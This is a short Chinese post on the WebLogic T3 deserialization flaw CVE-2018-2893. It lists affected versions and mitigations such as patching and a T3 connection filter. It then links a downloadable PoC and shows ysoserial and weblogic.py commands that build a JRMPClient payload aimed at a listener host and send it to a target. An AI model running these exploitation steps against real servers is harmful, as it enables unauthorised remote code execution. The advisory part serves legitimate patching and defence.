weblogic CVE-2018-2893

一、漏洞影响版本

WebLogic 10.3.6.0

WebLogic 12.1.3.0

WebLogic 12.2.1.2

WebLogic 12.2.1.3

二、漏洞处置建议:

1、美国甲骨文公司已发布了修复补丁,建议及时更新至最新版本:http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html

2、临时解决方案:控制T3协议的访问

此漏洞产生于WebLogic的T3服务,因此可通过控制T3协议的访问来临时阻断针对该漏洞的攻击。当开放WebLogic控制台端口(默认为7001端口)时,T3服务会默认开启。

具体操作:

(1)进入WebLogic控制台,在base_domain的配置页面中,进入“安全”选项卡页面,点击“筛选器”,进入连接筛选器配置。

(2)在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则中输入:127.0.0.1 * * allow t3 t3s,0.0.0.0/0 * *deny t3 t3s(t3和t3s协议的所有端口只允许本地访问)。

(3)保存后需重新启动,规则方可生效。

3、升级到 jdk-8u20以上的版本。

三、漏洞利用poc及使用方法

链接:https://pan.baidu.com/s/112_V2yIfKJXw4mu4PeoTNQ 密码:9sf5

README.md中有详细用法

演示一下过程

weblogic CVE-2018-2893_第1张图片

 

 

双击1.bat打开命令行

1、输入:java -jar ysoserial-cve-2018-2893.jar查看可以使用的payload

weblogic CVE-2018-2893_第2张图片

2、输入:java -jar ysoserial-cve-2018-2893.jar JRMPClient4 "123.xx.xx.xx:端口号" > poc4.ser,

此时会在当前文件夹下生成一个poc4.ser的文件

weblogic CVE-2018-2893_第3张图片

3、输入:python weblogic.py 123.xx.xx.xx 80 poc4.ser

查看返回结果判断是否存在

你可能感兴趣的:(漏洞)